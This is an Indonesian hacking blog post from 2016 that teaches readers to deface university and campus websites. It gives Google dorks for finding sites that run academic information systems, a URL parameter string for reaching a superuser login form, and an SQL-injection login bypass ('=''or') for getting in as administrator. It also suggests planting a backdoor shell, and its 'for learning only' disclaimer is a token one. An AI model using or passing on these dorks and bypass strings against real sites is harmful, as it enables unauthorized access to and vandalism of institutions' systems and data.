Friday, November 25, 2016

Deface Website Kampus/Universitas Dengan Bypass Admin

Tags




HELLO !!!

WELCOME ANONYMOUS !!!

Pada kesempatan kali ini kita akan membahas bagaimana cara deface menggunakan bypass admin !!! 

Okeh langsung ajah ya kita mulai !!!

1) pastikan kalian punya dork !!! Nih Kami Kasih Dork !!! 

inurl:"?mnux=" intext:siakad
inurl:"?mnux=" intext:akademik
inurl:"?mnux=" intext:sisfo
inurl:"?mnux=" site:id
inurl:"?mnux=" site:com
inurl:"?mnux=" site:net


Di kembangin lagi dorknya biar dapet web yang vuln !!!

2) Tuliskan dork tadi di google atau mesin pencari kesayangan anda , apabila langsung ketemu halaman login tinggal masukan bypassnya . Tapi kalo belum ketemu tinggal di exploit pake yang di bawah ini

EXPLOIT

?mnux=login&lgn=frm&lid=50&nme=Superuser

Tambahkan exploit ini dibelakang url example : www.target.com/?mnux=login&lgn=frm&lid=50&nme=Superuser



Paham ??? Paham lah ya , masa anak cyber begitu ajah gapaham :v

kalo udah ketemu halaman loginnya langsung masukin ajah tuh Bypassnya

user : '=''or'
pass: '=''or'



Langsung deh masuk sebagai admin/superuser !!! Selamat ya !!!

Tinggal terserah mau di apain sama kalian , ini cuman buat pembelajaran ajah ya . Jangan di salah gunakan !!! dorknya masih fresh , jadi kemungkinan work 99,5% .

Masang shell backdoornya? kayanya untuk sekarang udah gabisa di pasang shell deh, tapi di coba ajah dulu !!!

HACKING TIDAK LAH MUDAH !!! KALAU GAGAL COBA LAGI , JANGAN MENGELUH !!!  SEMANGAT !!!




TUTOR BY MR.TEN_WAP
FOLLOW INSTAGRAM https://instagram.com/anon_cyber_team
FACEBOOOK https://www.facebook.com/groups/1709090592690899/

 

thanks :)

3 comments


EmoticonEmoticon

Edu-Secure